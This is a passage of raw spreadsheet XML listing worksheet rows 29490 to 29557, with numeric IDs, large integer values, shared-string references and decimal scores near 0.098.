      <c r="E29490" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29490" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29491" ht="15.75" customHeight="1">
      <c r="A29491" s="1">
        <v>11003.0</v>
      </c>
      <c r="B29491" s="2">
        <v>1.7656891E7</v>
      </c>
      <c r="C29491" s="2" t="s">
        <v>28351</v>
      </c>
      <c r="D29491" s="2">
        <v>1.0</v>
      </c>
      <c r="E29491" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29491" s="2">
        <v>0.09935897435897434</v>
      </c>
    </row>
    <row r="29492" ht="15.75" customHeight="1">
      <c r="A29492" s="1">
        <v>18110.0</v>
      </c>
      <c r="B29492" s="2">
        <v>5.174432E7</v>
      </c>
      <c r="C29492" s="2" t="s">
        <v>28352</v>
      </c>
      <c r="D29492" s="2">
        <v>1.0</v>
      </c>
      <c r="E29492" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29492" s="2">
        <v>0.09935897435897434</v>
      </c>
    </row>
    <row r="29493" ht="15.75" customHeight="1">
      <c r="A29493" s="1">
        <v>3385.0</v>
      </c>
      <c r="B29493" s="2">
        <v>3.7955277E7</v>
      </c>
      <c r="C29493" s="2" t="s">
        <v>28353</v>
      </c>
      <c r="D29493" s="2">
        <v>1.0</v>
      </c>
      <c r="E29493" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29493" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="29494" ht="15.75" customHeight="1">
      <c r="A29494" s="1">
        <v>14427.0</v>
      </c>
      <c r="B29494" s="2">
        <v>3.926164E7</v>
      </c>
      <c r="C29494" s="2" t="s">
        <v>28354</v>
      </c>
      <c r="D29494" s="2">
        <v>1.0</v>
      </c>
      <c r="E29494" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29494" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="29495" ht="15.75" customHeight="1">
      <c r="A29495" s="1">
        <v>20108.0</v>
      </c>
      <c r="B29495" s="2">
        <v>9967211.0</v>
      </c>
      <c r="C29495" s="2" t="s">
        <v>28355</v>
      </c>
      <c r="D29495" s="2">
        <v>1.0</v>
      </c>
      <c r="E29495" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29495" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="29496" ht="15.75" customHeight="1">
      <c r="A29496" s="1">
        <v>604.0</v>
      </c>
      <c r="B29496" s="2">
        <v>1.9346842E7</v>
      </c>
      <c r="C29496" s="2" t="s">
        <v>28356</v>
      </c>
      <c r="D29496" s="2">
        <v>1.0</v>
      </c>
      <c r="E29496" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29496" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29497" ht="15.75" customHeight="1">
      <c r="A29497" s="1">
        <v>4766.0</v>
      </c>
      <c r="B29497" s="2">
        <v>4.3432772E7</v>
      </c>
      <c r="C29497" s="2" t="s">
        <v>28357</v>
      </c>
      <c r="D29497" s="2">
        <v>1.0</v>
      </c>
      <c r="E29497" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29497" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29498" ht="15.75" customHeight="1">
      <c r="A29498" s="1">
        <v>6585.0</v>
      </c>
      <c r="B29498" s="2">
        <v>4.8971301E7</v>
      </c>
      <c r="C29498" s="2" t="s">
        <v>28358</v>
      </c>
      <c r="D29498" s="2">
        <v>1.0</v>
      </c>
      <c r="E29498" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29498" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29499" ht="15.75" customHeight="1">
      <c r="A29499" s="1">
        <v>6924.0</v>
      </c>
      <c r="B29499" s="2">
        <v>4.9874684E7</v>
      </c>
      <c r="C29499" s="2" t="s">
        <v>28359</v>
      </c>
      <c r="D29499" s="2">
        <v>1.0</v>
      </c>
      <c r="E29499" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29499" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29500" ht="15.75" customHeight="1">
      <c r="A29500" s="1">
        <v>7155.0</v>
      </c>
      <c r="B29500" s="2">
        <v>5.0474245E7</v>
      </c>
      <c r="C29500" s="2" t="s">
        <v>28360</v>
      </c>
      <c r="D29500" s="2">
        <v>1.0</v>
      </c>
      <c r="E29500" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29500" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29501" ht="15.75" customHeight="1">
      <c r="A29501" s="1">
        <v>7741.0</v>
      </c>
      <c r="B29501" s="2">
        <v>5.2053004E7</v>
      </c>
      <c r="C29501" s="2" t="s">
        <v>28361</v>
      </c>
      <c r="D29501" s="2">
        <v>1.0</v>
      </c>
      <c r="E29501" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29501" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29502" ht="15.75" customHeight="1">
      <c r="A29502" s="1">
        <v>12313.0</v>
      </c>
      <c r="B29502" s="2">
        <v>2.8424173E7</v>
      </c>
      <c r="C29502" s="2" t="s">
        <v>28362</v>
      </c>
      <c r="D29502" s="2">
        <v>1.0</v>
      </c>
      <c r="E29502" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29502" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29503" ht="15.75" customHeight="1">
      <c r="A29503" s="1">
        <v>12347.0</v>
      </c>
      <c r="B29503" s="2">
        <v>2.8646927E7</v>
      </c>
      <c r="C29503" s="2" t="s">
        <v>28363</v>
      </c>
      <c r="D29503" s="2">
        <v>1.0</v>
      </c>
      <c r="E29503" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29503" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29504" ht="15.75" customHeight="1">
      <c r="A29504" s="1">
        <v>12742.0</v>
      </c>
      <c r="B29504" s="2">
        <v>3.1084995E7</v>
      </c>
      <c r="C29504" s="2" t="s">
        <v>28364</v>
      </c>
      <c r="D29504" s="2">
        <v>1.0</v>
      </c>
      <c r="E29504" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29504" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29505" ht="15.75" customHeight="1">
      <c r="A29505" s="1">
        <v>14143.0</v>
      </c>
      <c r="B29505" s="2">
        <v>3.7952479E7</v>
      </c>
      <c r="C29505" s="2" t="s">
        <v>28365</v>
      </c>
      <c r="D29505" s="2">
        <v>1.0</v>
      </c>
      <c r="E29505" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29505" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29506" ht="15.75" customHeight="1">
      <c r="A29506" s="1">
        <v>16882.0</v>
      </c>
      <c r="B29506" s="2">
        <v>4.8001019E7</v>
      </c>
      <c r="C29506" s="2" t="s">
        <v>28366</v>
      </c>
      <c r="D29506" s="2">
        <v>1.0</v>
      </c>
      <c r="E29506" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29506" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29507" ht="15.75" customHeight="1">
      <c r="A29507" s="1">
        <v>17139.0</v>
      </c>
      <c r="B29507" s="2">
        <v>4.882972E7</v>
      </c>
      <c r="C29507" s="2" t="s">
        <v>28367</v>
      </c>
      <c r="D29507" s="2">
        <v>1.0</v>
      </c>
      <c r="E29507" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29507" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29508" ht="15.75" customHeight="1">
      <c r="A29508" s="1">
        <v>17191.0</v>
      </c>
      <c r="B29508" s="2">
        <v>4.8927576E7</v>
      </c>
      <c r="C29508" s="2" t="s">
        <v>28368</v>
      </c>
      <c r="D29508" s="2">
        <v>1.0</v>
      </c>
      <c r="E29508" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29508" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29509" ht="15.75" customHeight="1">
      <c r="A29509" s="1">
        <v>19817.0</v>
      </c>
      <c r="B29509" s="2">
        <v>5.6955993E7</v>
      </c>
      <c r="C29509" s="2" t="s">
        <v>28369</v>
      </c>
      <c r="D29509" s="2">
        <v>1.0</v>
      </c>
      <c r="E29509" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29509" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29510" ht="15.75" customHeight="1">
      <c r="A29510" s="1">
        <v>19928.0</v>
      </c>
      <c r="B29510" s="2">
        <v>5.7434773E7</v>
      </c>
      <c r="C29510" s="2" t="s">
        <v>28370</v>
      </c>
      <c r="D29510" s="2">
        <v>1.0</v>
      </c>
      <c r="E29510" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29510" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="29511" ht="15.75" customHeight="1">
      <c r="A29511" s="1">
        <v>15858.0</v>
      </c>
      <c r="B29511" s="2">
        <v>4.4476423E7</v>
      </c>
      <c r="C29511" s="2" t="s">
        <v>28371</v>
      </c>
      <c r="D29511" s="2">
        <v>1.0</v>
      </c>
      <c r="E29511" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29511" s="2">
        <v>0.09887005649717513</v>
      </c>
    </row>
    <row r="29512" ht="15.75" customHeight="1">
      <c r="A29512" s="1">
        <v>25747.0</v>
      </c>
      <c r="B29512" s="2">
        <v>1.4600289E7</v>
      </c>
      <c r="C29512" s="2" t="s">
        <v>28372</v>
      </c>
      <c r="D29512" s="2">
        <v>1.0</v>
      </c>
      <c r="E29512" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29512" s="2">
        <v>0.09887005649717513</v>
      </c>
    </row>
    <row r="29513" ht="15.75" customHeight="1">
      <c r="A29513" s="1">
        <v>33410.0</v>
      </c>
      <c r="B29513" s="2">
        <v>7732516.0</v>
      </c>
      <c r="C29513" s="2" t="s">
        <v>28373</v>
      </c>
      <c r="D29513" s="2">
        <v>1.0</v>
      </c>
      <c r="E29513" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29513" s="2">
        <v>0.09865900383141762</v>
      </c>
    </row>
    <row r="29514" ht="15.75" customHeight="1">
      <c r="A29514" s="1">
        <v>4162.0</v>
      </c>
      <c r="B29514" s="2">
        <v>4.1517759E7</v>
      </c>
      <c r="C29514" s="2" t="s">
        <v>28374</v>
      </c>
      <c r="D29514" s="2">
        <v>1.0</v>
      </c>
      <c r="E29514" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29514" s="2">
        <v>0.09865900383141761</v>
      </c>
    </row>
    <row r="29515" ht="15.75" customHeight="1">
      <c r="A29515" s="1">
        <v>29466.0</v>
      </c>
      <c r="B29515" s="2">
        <v>3.2348199E7</v>
      </c>
      <c r="C29515" s="2" t="s">
        <v>28375</v>
      </c>
      <c r="D29515" s="2">
        <v>1.0</v>
      </c>
      <c r="E29515" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29515" s="2">
        <v>0.09865900383141761</v>
      </c>
    </row>
    <row r="29516" ht="15.75" customHeight="1">
      <c r="A29516" s="1">
        <v>16542.0</v>
      </c>
      <c r="B29516" s="2">
        <v>4.6778094E7</v>
      </c>
      <c r="C29516" s="2" t="s">
        <v>28376</v>
      </c>
      <c r="D29516" s="2">
        <v>1.0</v>
      </c>
      <c r="E29516" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29516" s="2">
        <v>0.09844054580896686</v>
      </c>
    </row>
    <row r="29517" ht="15.75" customHeight="1">
      <c r="A29517" s="1">
        <v>18310.0</v>
      </c>
      <c r="B29517" s="2">
        <v>5.237314E7</v>
      </c>
      <c r="C29517" s="2" t="s">
        <v>28377</v>
      </c>
      <c r="D29517" s="2">
        <v>1.0</v>
      </c>
      <c r="E29517" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29517" s="2">
        <v>0.09844054580896684</v>
      </c>
    </row>
    <row r="29518" ht="15.75" customHeight="1">
      <c r="A29518" s="1">
        <v>22797.0</v>
      </c>
      <c r="B29518" s="2">
        <v>4.5569132E7</v>
      </c>
      <c r="C29518" s="2" t="s">
        <v>28378</v>
      </c>
      <c r="D29518" s="2">
        <v>1.0</v>
      </c>
      <c r="E29518" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29518" s="2">
        <v>0.09844054580896684</v>
      </c>
    </row>
    <row r="29519" ht="15.75" customHeight="1">
      <c r="A29519" s="1">
        <v>10410.0</v>
      </c>
      <c r="B29519" s="2">
        <v>9831119.0</v>
      </c>
      <c r="C29519" s="2" t="s">
        <v>28379</v>
      </c>
      <c r="D29519" s="2">
        <v>1.0</v>
      </c>
      <c r="E29519" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29519" s="2">
        <v>0.09821428571428573</v>
      </c>
    </row>
    <row r="29520" ht="15.75" customHeight="1">
      <c r="A29520" s="1">
        <v>6801.0</v>
      </c>
      <c r="B29520" s="2">
        <v>4.9518928E7</v>
      </c>
      <c r="C29520" s="2" t="s">
        <v>28380</v>
      </c>
      <c r="D29520" s="2">
        <v>1.0</v>
      </c>
      <c r="E29520" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29520" s="2">
        <v>0.09821428571428571</v>
      </c>
    </row>
    <row r="29521" ht="15.75" customHeight="1">
      <c r="A29521" s="1">
        <v>1449.0</v>
      </c>
      <c r="B29521" s="2">
        <v>2.6825804E7</v>
      </c>
      <c r="C29521" s="2" t="s">
        <v>28381</v>
      </c>
      <c r="D29521" s="2">
        <v>1.0</v>
      </c>
      <c r="E29521" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29521" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="29522" ht="15.75" customHeight="1">
      <c r="A29522" s="1">
        <v>18442.0</v>
      </c>
      <c r="B29522" s="2">
        <v>5.2777446E7</v>
      </c>
      <c r="C29522" s="2" t="s">
        <v>28382</v>
      </c>
      <c r="D29522" s="2">
        <v>1.0</v>
      </c>
      <c r="E29522" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29522" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="29523" ht="15.75" customHeight="1">
      <c r="A29523" s="1">
        <v>26005.0</v>
      </c>
      <c r="B29523" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C29523" s="2" t="s">
        <v>28383</v>
      </c>
      <c r="D29523" s="2">
        <v>1.0</v>
      </c>
      <c r="E29523" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29523" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="29524" ht="15.75" customHeight="1">
      <c r="A29524" s="1">
        <v>24270.0</v>
      </c>
      <c r="B29524" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C29524" s="2" t="s">
        <v>28384</v>
      </c>
      <c r="D29524" s="2">
        <v>1.0</v>
      </c>
      <c r="E29524" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29524" s="2">
        <v>0.09797979797979797</v>
      </c>
    </row>
    <row r="29525" ht="15.75" customHeight="1">
      <c r="A29525" s="1">
        <v>6602.0</v>
      </c>
      <c r="B29525" s="2">
        <v>4.901336E7</v>
      </c>
      <c r="C29525" s="2" t="s">
        <v>28385</v>
      </c>
      <c r="D29525" s="2">
        <v>1.0</v>
      </c>
      <c r="E29525" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29525" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="29526" ht="15.75" customHeight="1">
      <c r="A29526" s="1">
        <v>8504.0</v>
      </c>
      <c r="B29526" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C29526" s="2" t="s">
        <v>28386</v>
      </c>
      <c r="D29526" s="2">
        <v>1.0</v>
      </c>
      <c r="E29526" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29526" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="29527" ht="15.75" customHeight="1">
      <c r="A29527" s="1">
        <v>18085.0</v>
      </c>
      <c r="B29527" s="2">
        <v>5.1657215E7</v>
      </c>
      <c r="C29527" s="2" t="s">
        <v>28387</v>
      </c>
      <c r="D29527" s="2">
        <v>1.0</v>
      </c>
      <c r="E29527" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29527" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="29528" ht="15.75" customHeight="1">
      <c r="A29528" s="1">
        <v>28077.0</v>
      </c>
      <c r="B29528" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C29528" s="2" t="s">
        <v>28388</v>
      </c>
      <c r="D29528" s="2">
        <v>1.0</v>
      </c>
      <c r="E29528" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29528" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="29529" ht="15.75" customHeight="1">
      <c r="A29529" s="1">
        <v>28747.0</v>
      </c>
      <c r="B29529" s="2">
        <v>2.8122256E7</v>
      </c>
      <c r="C29529" s="2" t="s">
        <v>28389</v>
      </c>
      <c r="D29529" s="2">
        <v>1.0</v>
      </c>
      <c r="E29529" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29529" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="29530" ht="15.75" customHeight="1">
      <c r="A29530" s="1">
        <v>33240.0</v>
      </c>
      <c r="B29530" s="2">
        <v>7303601.0</v>
      </c>
      <c r="C29530" s="2" t="s">
        <v>28390</v>
      </c>
      <c r="D29530" s="2">
        <v>1.0</v>
      </c>
      <c r="E29530" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29530" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="29531" ht="15.75" customHeight="1">
      <c r="A29531" s="1">
        <v>12502.0</v>
      </c>
      <c r="B29531" s="2">
        <v>2.9632869E7</v>
      </c>
      <c r="C29531" s="2" t="s">
        <v>28391</v>
      </c>
      <c r="D29531" s="2">
        <v>1.0</v>
      </c>
      <c r="E29531" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29531" s="2">
        <v>0.09797979797979794</v>
      </c>
    </row>
    <row r="29532" ht="15.75" customHeight="1">
      <c r="A29532" s="1">
        <v>1218.0</v>
      </c>
      <c r="B29532" s="2">
        <v>2.4878529E7</v>
      </c>
      <c r="C29532" s="2" t="s">
        <v>28392</v>
      </c>
      <c r="D29532" s="2">
        <v>1.0</v>
      </c>
      <c r="E29532" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29532" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="29533" ht="15.75" customHeight="1">
      <c r="A29533" s="1">
        <v>7611.0</v>
      </c>
      <c r="B29533" s="2">
        <v>5.1694068E7</v>
      </c>
      <c r="C29533" s="2" t="s">
        <v>28393</v>
      </c>
      <c r="D29533" s="2">
        <v>1.0</v>
      </c>
      <c r="E29533" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29533" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="29534" ht="15.75" customHeight="1">
      <c r="A29534" s="1">
        <v>11453.0</v>
      </c>
      <c r="B29534" s="2">
        <v>2.1809962E7</v>
      </c>
      <c r="C29534" s="2" t="s">
        <v>28394</v>
      </c>
      <c r="D29534" s="2">
        <v>1.0</v>
      </c>
      <c r="E29534" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29534" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="29535" ht="15.75" customHeight="1">
      <c r="A29535" s="1">
        <v>21526.0</v>
      </c>
      <c r="B29535" s="2">
        <v>2.3389042E7</v>
      </c>
      <c r="C29535" s="2" t="s">
        <v>28395</v>
      </c>
      <c r="D29535" s="2">
        <v>1.0</v>
      </c>
      <c r="E29535" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29535" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="29536" ht="15.75" customHeight="1">
      <c r="A29536" s="1">
        <v>27707.0</v>
      </c>
      <c r="B29536" s="2">
        <v>2.3043535E7</v>
      </c>
      <c r="C29536" s="2" t="s">
        <v>28396</v>
      </c>
      <c r="D29536" s="2">
        <v>1.0</v>
      </c>
      <c r="E29536" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29536" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="29537" ht="15.75" customHeight="1">
      <c r="A29537" s="1">
        <v>483.0</v>
      </c>
      <c r="B29537" s="2">
        <v>1.7503094E7</v>
      </c>
      <c r="C29537" s="2" t="s">
        <v>28397</v>
      </c>
      <c r="D29537" s="2">
        <v>1.0</v>
      </c>
      <c r="E29537" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29537" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="29538" ht="15.75" customHeight="1">
      <c r="A29538" s="1">
        <v>4026.0</v>
      </c>
      <c r="B29538" s="2">
        <v>4.099315E7</v>
      </c>
      <c r="C29538" s="2" t="s">
        <v>28398</v>
      </c>
      <c r="D29538" s="2">
        <v>1.0</v>
      </c>
      <c r="E29538" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29538" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="29539" ht="15.75" customHeight="1">
      <c r="A29539" s="1">
        <v>19781.0</v>
      </c>
      <c r="B29539" s="2">
        <v>5.6795871E7</v>
      </c>
      <c r="C29539" s="2" t="s">
        <v>28399</v>
      </c>
      <c r="D29539" s="2">
        <v>1.0</v>
      </c>
      <c r="E29539" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29539" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="29540" ht="15.75" customHeight="1">
      <c r="A29540" s="1">
        <v>29044.0</v>
      </c>
      <c r="B29540" s="2">
        <v>3.019216E7</v>
      </c>
      <c r="C29540" s="2" t="s">
        <v>13291</v>
      </c>
      <c r="D29540" s="2">
        <v>1.0</v>
      </c>
      <c r="E29540" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29540" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="29541" ht="15.75" customHeight="1">
      <c r="A29541" s="1">
        <v>5147.0</v>
      </c>
      <c r="B29541" s="2">
        <v>4.4660802E7</v>
      </c>
      <c r="C29541" s="2" t="s">
        <v>28400</v>
      </c>
      <c r="D29541" s="2">
        <v>1.0</v>
      </c>
      <c r="E29541" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29541" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="29542" ht="15.75" customHeight="1">
      <c r="A29542" s="1">
        <v>9808.0</v>
      </c>
      <c r="B29542" s="2">
        <v>5.6588531E7</v>
      </c>
      <c r="C29542" s="2" t="s">
        <v>28401</v>
      </c>
      <c r="D29542" s="2">
        <v>1.0</v>
      </c>
      <c r="E29542" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29542" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="29543" ht="15.75" customHeight="1">
      <c r="A29543" s="1">
        <v>12162.0</v>
      </c>
      <c r="B29543" s="2">
        <v>2.7322282E7</v>
      </c>
      <c r="C29543" s="2" t="s">
        <v>28402</v>
      </c>
      <c r="D29543" s="2">
        <v>1.0</v>
      </c>
      <c r="E29543" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29543" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="29544" ht="15.75" customHeight="1">
      <c r="A29544" s="1">
        <v>18350.0</v>
      </c>
      <c r="B29544" s="2">
        <v>5.2479984E7</v>
      </c>
      <c r="C29544" s="2" t="s">
        <v>28403</v>
      </c>
      <c r="D29544" s="2">
        <v>1.0</v>
      </c>
      <c r="E29544" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29544" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="29545" ht="15.75" customHeight="1">
      <c r="A29545" s="1">
        <v>19114.0</v>
      </c>
      <c r="B29545" s="2">
        <v>5.4748473E7</v>
      </c>
      <c r="C29545" s="2" t="s">
        <v>28404</v>
      </c>
      <c r="D29545" s="2">
        <v>1.0</v>
      </c>
      <c r="E29545" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29545" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="29546" ht="15.75" customHeight="1">
      <c r="A29546" s="1">
        <v>23404.0</v>
      </c>
      <c r="B29546" s="2">
        <v>5591841.0</v>
      </c>
      <c r="C29546" s="2" t="s">
        <v>18741</v>
      </c>
      <c r="D29546" s="2">
        <v>1.0</v>
      </c>
      <c r="E29546" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29546" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="29547" ht="15.75" customHeight="1">
      <c r="A29547" s="1">
        <v>32308.0</v>
      </c>
      <c r="B29547" s="2">
        <v>5.5629291E7</v>
      </c>
      <c r="C29547" s="2" t="s">
        <v>28405</v>
      </c>
      <c r="D29547" s="2">
        <v>1.0</v>
      </c>
      <c r="E29547" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29547" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="29548" ht="15.75" customHeight="1">
      <c r="A29548" s="1">
        <v>2253.0</v>
      </c>
      <c r="B29548" s="2">
        <v>3.2362695E7</v>
      </c>
      <c r="C29548" s="2" t="s">
        <v>28406</v>
      </c>
      <c r="D29548" s="2">
        <v>1.0</v>
      </c>
      <c r="E29548" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29548" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="29549" ht="15.75" customHeight="1">
      <c r="A29549" s="1">
        <v>3947.0</v>
      </c>
      <c r="B29549" s="2">
        <v>4.0631235E7</v>
      </c>
      <c r="C29549" s="2" t="s">
        <v>28407</v>
      </c>
      <c r="D29549" s="2">
        <v>1.0</v>
      </c>
      <c r="E29549" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29549" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="29550" ht="15.75" customHeight="1">
      <c r="A29550" s="1">
        <v>8553.0</v>
      </c>
      <c r="B29550" s="2">
        <v>5.4149195E7</v>
      </c>
      <c r="C29550" s="2" t="s">
        <v>28408</v>
      </c>
      <c r="D29550" s="2">
        <v>1.0</v>
      </c>
      <c r="E29550" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29550" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="29551" ht="15.75" customHeight="1">
      <c r="A29551" s="1">
        <v>12662.0</v>
      </c>
      <c r="B29551" s="2">
        <v>3.0520451E7</v>
      </c>
      <c r="C29551" s="2" t="s">
        <v>28409</v>
      </c>
      <c r="D29551" s="2">
        <v>1.0</v>
      </c>
      <c r="E29551" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29551" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="29552" ht="15.75" customHeight="1">
      <c r="A29552" s="1">
        <v>17308.0</v>
      </c>
      <c r="B29552" s="2">
        <v>4.9314545E7</v>
      </c>
      <c r="C29552" s="2" t="s">
        <v>28410</v>
      </c>
      <c r="D29552" s="2">
        <v>1.0</v>
      </c>
      <c r="E29552" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29552" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="29553" ht="15.75" customHeight="1">
      <c r="A29553" s="1">
        <v>25555.0</v>
      </c>
      <c r="B29553" s="2">
        <v>1.4280844E7</v>
      </c>
      <c r="C29553" s="2" t="s">
        <v>28411</v>
      </c>
      <c r="D29553" s="2">
        <v>1.0</v>
      </c>
      <c r="E29553" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29553" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="29554" ht="15.75" customHeight="1">
      <c r="A29554" s="1">
        <v>26281.0</v>
      </c>
      <c r="B29554" s="2">
        <v>1.6424642E7</v>
      </c>
      <c r="C29554" s="2" t="s">
        <v>28412</v>
      </c>
      <c r="D29554" s="2">
        <v>1.0</v>
      </c>
      <c r="E29554" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29554" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="29555" ht="15.75" customHeight="1">
      <c r="A29555" s="1">
        <v>26495.0</v>
      </c>
      <c r="B29555" s="2">
        <v>1.7528222E7</v>
      </c>
      <c r="C29555" s="2" t="s">
        <v>28413</v>
      </c>
      <c r="D29555" s="2">
        <v>1.0</v>
      </c>
      <c r="E29555" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29555" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="29556" ht="15.75" customHeight="1">
      <c r="A29556" s="1">
        <v>2784.0</v>
      </c>
      <c r="B29556" s="2">
        <v>3.5214896E7</v>
      </c>
      <c r="C29556" s="2" t="s">
        <v>28414</v>
      </c>
      <c r="D29556" s="2">
        <v>1.0</v>
      </c>
      <c r="E29556" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29556" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29557" ht="15.75" customHeight="1">
      <c r="A29557" s="1">
        <v>3244.0</v>
      </c>
      <c r="B29557" s="2">
        <v>3.7381225E7</v>
      </c>
      <c r="C29557" s="2" t="s">
        <v>28415</v>
      </c>
      <c r="D29557" s="2">
        <v>1.0</v>
      </c>
